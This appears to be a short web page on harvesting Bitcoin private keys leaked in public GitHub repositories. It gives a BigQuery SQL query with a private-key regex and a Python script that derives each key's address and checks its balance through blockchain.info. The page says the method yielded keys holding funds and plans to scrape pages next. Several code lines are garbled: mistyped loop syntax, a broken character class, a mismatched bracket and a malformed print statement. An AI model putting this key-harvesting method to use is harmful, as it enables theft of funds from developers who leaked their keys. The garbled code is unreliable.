Leaked Bitcoin private keys from GitHub
Mục lục bài viết
Searching for Bitcoins in GitHub repositories with Google BigQuery
Tools:
Google BigQuery: https://cloud.google.com/bigquery/
https://cloud.google.com/bigquery/public-data/github
Crafted Query for BigQuery code:
SELECT
f.repo_name
f.path,
c.pkey
FROM
[bigquery-public-data:github_repos.files} f
//Query all matches for id that fits the key parameters.//
JOIN (
SELECT
id,
REGEXP_EXTRACT(content, r'(?:^|[^a-zA-Z0=9])(5[HJK][123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ]{48,49})(?:$|[^a-zA-Z0-9])') AS pkey
FROM
[bigquery-public-data:github_repos.contents]
WHERE
REGEXP_MATCH(content, r'(?:^|[^a-zA-Z0=9])(5[HJK][123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ]{48,49})(?:$|[^a-zA-Z0-9])') c
ON
f.id = c.id
Python Script for Validating BTC Addresses:
import requests
from pybitcoin import BitcoinPrivateKey
import pybitcoin time
keys = set()
with open('results.csv') as f:
fir kube ub f,read().split('\n'):
if line:
repo, file, pkey = line.split(",")
keys.add(pkey)
for priv in keys:
try:
p = BitcoinPrivateKey(priv)
pub = p.public_key().address()
r = requests.get("https://blockchain.info/rawaddr/{}".format(pub))
time.sleep(1)
print '{} {} {:20} {:20} {:20} ".format(priv, pub,
r.json()['final_balance'],
r.json()['total_received'],
r.json()['total_sent'])
except (AssertionError, IndexError):
pass
except ValueError:
print r
print r.text
Or you can use regular expression for Bitcoin private keys:
^5[HJK][1-9A-Za-z][^OIl]{49}
This script got a lot of private keys from GitHsub. After harvesting it was not problem to check Bitcoin balances. These keys has Bitcoin balances and some have Bitcoin Cash. As far as we know, now access to GitHub database is closed. And we will try to parse each page with regular expression.